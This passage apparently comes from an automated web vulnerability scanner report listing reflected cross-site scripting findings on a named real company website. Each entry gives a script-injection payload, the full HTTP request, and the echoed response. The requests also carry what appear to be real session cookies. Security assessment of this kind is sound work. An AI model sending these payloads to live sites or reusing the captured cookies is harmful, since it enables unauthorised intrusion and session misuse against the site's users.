GET /information/legal/index.php?d3a89"><script>alert(1)</script>0d45bdf3fa5=1 HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol ...[SNIP]... onclick="track_chat_button('Green Chat Tab');window.open('https://admin.instantservice.com/Customer?ai=7513&di=39941&email=a@a.com&optionaldata2=http://www.rackspace.com/information/legal/index.php?d3a89"><script>alert(1)</script>0d45bdf3fa5=1&optionaldata3=cleanEntry&optionaldata4=US4da9da571af9d6d58e6c524219e4d7f8&optionaldata5=2f0f5a42e06467fc5ccee756','custclient','width=500,height=320');return false;"> ...[SNIP]...
4.149. http://www.rackspace.com/information/legal/mailterms.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.rackspace.com
Path:
/information/legal/mailterms.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b40e3"><script>alert(1)</script>d6704c63428 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /information/legal/mailterms.php?b40e3"><script>alert(1)</script>d6704c63428=1 HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol ...[SNIP]... nclick="track_chat_button('Green Chat Tab');window.open('https://admin.instantservice.com/Customer?ai=7513&di=39941&email=a@a.com&optionaldata2=http://www.rackspace.com/information/legal/mailterms.php?b40e3"><script>alert(1)</script>d6704c63428=1&optionaldata3=cleanEntry&optionaldata4=US4da9da571af9d6d58e6c524219e4d7f8&optionaldata5=http://www.google.com/search?hl=en&q=5a9e0%2522a%253d%2522b%25224adc5fe066e','custclient','width=500,height=32 ...[SNIP]...
4.150. http://www.rackspace.com/information/legal/privacystatement.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.rackspace.com
Path:
/information/legal/privacystatement.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d0700"><script>alert(1)</script>997b906ae68 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /information/legal/privacystatement.php?d0700"><script>alert(1)</script>997b906ae68=1 HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol ...[SNIP]... "track_chat_button('Green Chat Tab');window.open('https://admin.instantservice.com/Customer?ai=7513&di=39941&email=a@a.com&optionaldata2=http://www.rackspace.com/information/legal/privacystatement.php?d0700"><script>alert(1)</script>997b906ae68=1&optionaldata3=cleanEntry&optionaldata4=US4da9da571af9d6d58e6c524219e4d7f8&optionaldata5=http://www.google.com/search?hl=en&q=5a9e0%2522a%253d%2522b%25224adc5fe066e','custclient','width=500,height=32 ...[SNIP]...
4.151. http://www.rackspace.com/information/legal/sharepointappterms.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.rackspace.com
Path:
/information/legal/sharepointappterms.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dec61"><script>alert(1)</script>f5b590d92a6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /information/legal/sharepointappterms.php?dec61"><script>alert(1)</script>f5b590d92a6=1 HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol ...[SNIP]... rack_chat_button('Green Chat Tab');window.open('https://admin.instantservice.com/Customer?ai=7513&di=39941&email=a@a.com&optionaldata2=http://www.rackspace.com/information/legal/sharepointappterms.php?dec61"><script>alert(1)</script>f5b590d92a6=1&optionaldata3=cleanEntry&optionaldata4=US4da9da571af9d6d58e6c524219e4d7f8&optionaldata5=http://www.google.com/search?hl=en&q=2f0f5a425300ec182657b7e0','custclient','width=500,height=320');return fal ...[SNIP]...
4.152. http://www.rackspace.com/information/links.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.rackspace.com
Path:
/information/links.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aaa2e"><script>alert(1)</script>5a35fbc33f8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /information/links.php?aaa2e"><script>alert(1)</script>5a35fbc33f8=1 HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol ...[SNIP]... rap" onclick="track_chat_button('Green Chat Tab');window.open('https://admin.instantservice.com/Customer?ai=7513&di=39941&email=a@a.com&optionaldata2=http://www.rackspace.com/information/links.php?aaa2e"><script>alert(1)</script>5a35fbc33f8=1&optionaldata3=cleanEntry&optionaldata4=US4da9da571af9d6d58e6c524219e4d7f8&optionaldata5=2f0f5a423706ce3acae18c89','custclient','width=500,height=320');return false;"> ...[SNIP]...
4.153. http://www.rackspace.com/information/mediacenter/links.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.rackspace.com
Path:
/information/mediacenter/links.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8fa63"><script>alert(1)</script>bc94c2bf2c6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /information/mediacenter/links.php?8fa63"><script>alert(1)</script>bc94c2bf2c6=1 HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol ...[SNIP]... rap" onclick="track_chat_button('Green Chat Tab');window.open('https://admin.instantservice.com/Customer?ai=7513&di=39941&email=a@a.com&optionaldata2=http://www.rackspace.com/information/links.php?8fa63"><script>alert(1)</script>bc94c2bf2c6=1&optionaldata3=cleanEntry&optionaldata4=US4da9da571af9d6d58e6c524219e4d7f8&optionaldata5=http://www.google.com/search?hl=en&q=2f0f5a4242353bda923acdd2','custclient','width=500,height=320');return fal ...[SNIP]...
4.154. http://www.rackspace.com/information/newsroom/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.rackspace.com
Path:
/information/newsroom/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 77ccd"><script>alert(1)</script>b2db4d002c9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 77ccd\"><script>alert(1)</script>b2db4d002c9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /information/newsroom/?77ccd"><script>alert(1)</script>b2db4d002c9=1 HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8d1e1"><script>alert(1)</script>a6ab46874fc was submitted in the REST URL parameter 3. This input was echoed as 8d1e1\"><script>alert(1)</script>a6ab46874fc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /information/newsroom/index.php8d1e1"><script>alert(1)</script>a6ab46874fc HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol ...[SNIP]... onclick="track_chat_button('Green Chat Tab');window.open('https://admin.instantservice.com/Customer?ai=7513&di=39941&email=a@a.com&optionaldata2=http://www.rackspace.com/information/newsroom/index.php8d1e1\"><script>alert(1)</script>a6ab46874fc&optionaldata3=cleanEntry&optionaldata4=US4da9da571af9d6d58e6c524219e4d7f8&optionaldata5=2f0f5a42a8503e776f91e0e5','custclient','width=500,height=320');return false;"> ...[SNIP]...
4.156. http://www.rackspace.com/managed_hosting/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.rackspace.com
Path:
/managed_hosting/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c09e"><script>alert(1)</script>0eff7bb63a7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /managed_hosting/?1c09e"><script>alert(1)</script>0eff7bb63a7=1 HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol ...[SNIP]... ite-wrap" onclick="track_chat_button('Green Chat Tab');window.open('https://admin.instantservice.com/Customer?ai=7513&di=39941&email=a@a.com&optionaldata2=http://www.rackspace.com/managed_hosting/?1c09e"><script>alert(1)</script>0eff7bb63a7=1&optionaldata3=cleanEntry&optionaldata4=US4da9da571af9d6d58e6c524219e4d7f8&optionaldata5=http://www.google.com/search?hl=en&q=2f0f5a42a9db35b45dd84769','custclient','width=500,height=320');return fal ...[SNIP]...
4.157. http://www.rackspace.com/managed_hosting/configurations.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.rackspace.com
Path:
/managed_hosting/configurations.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a388"><script>alert(1)</script>269221c25b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /managed_hosting/configurations.php?4a388"><script>alert(1)</script>269221c25b=1 HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol ...[SNIP]... ick="track_chat_button('Green Chat Tab');window.open('https://admin.instantservice.com/Customer?ai=7513&di=39941&email=a@a.com&optionaldata2=http://www.rackspace.com/managed_hosting/configurations.php?4a388"><script>alert(1)</script>269221c25b=1&optionaldata3=cleanEntry&optionaldata4=US4da9da571af9d6d58e6c524219e4d7f8&optionaldata5=2f0f5a42a8503e776f91e0e5','custclient','width=500,height=320');return false;"> ...[SNIP]...
4.158. http://www.rackspace.com/managed_hosting/dedicated_servers.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.rackspace.com
Path:
/managed_hosting/dedicated_servers.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 52935"><script>alert(1)</script>6e41b61991 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /managed_hosting/dedicated_servers.php?52935"><script>alert(1)</script>6e41b61991=1 HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
